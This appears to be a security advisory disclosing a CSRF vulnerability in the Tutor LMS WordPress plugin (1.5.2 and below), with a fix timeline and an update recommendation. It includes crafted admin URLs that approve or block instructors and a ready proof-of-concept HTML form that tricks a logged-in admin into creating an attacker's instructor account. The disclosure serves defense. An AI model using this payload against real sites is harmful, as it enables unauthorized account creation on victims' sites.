While testing the popular WordPress LMS plugin, Tutor LMS, for one of Astra‘s clients, I was able to find that the plugin is vulnerable to Cross-Site Request Forgery (CSRF). All WordPress websites using Tutor LMS version 1.5.2 and below are affected.
Summary
The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses. CSRF is an attack a hacker can use to cause unintended action to occur on a site trusted by the victim and is authenticated on at the time of the attack.
Vulnerability
As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF attack to approve an attacker-controlled instructor account can be performed by having the admin visit https://domain.com/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, after retrieving the instructor ID during the registration process.
An approved instructor can also be blocked by directing the admin to visit https://domain.com/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.
CSRF attack can also be performed on the form present at https://domain.com/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://domain.com can be tricked into visiting the link and triggering the request to add an instructor.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://domain.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_new_instructor" />
<input type="hidden" name="first_name" value="John" />
<input type="hidden" name="last_name" value="Doe" />
<input type="hidden" name="user_login" value="jd_instructor" />
<input type="hidden" name="email" value="jd@domain.com" />
<input type="hidden" name="phone_number" value="1231231231" />
<input type="hidden" name="password" value="Pa$$w0rd!" />
<input type="hidden" name="password_confirmation" value="Pa$$w0rd!" />
<input type="hidden" name="tutor_profile_bio" value="Et tempore culpa n" />
<input type="hidden" name="action" value="tutor_add_instructor" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Timeline
- Vulnerability reported to the Tutor LMS team – January 30, 2020.
- Tutor LMS version 1.5.3 containing the fix released – February 4, 2020.
Recommendation
It is highly recommended to update the plugin to the latest version.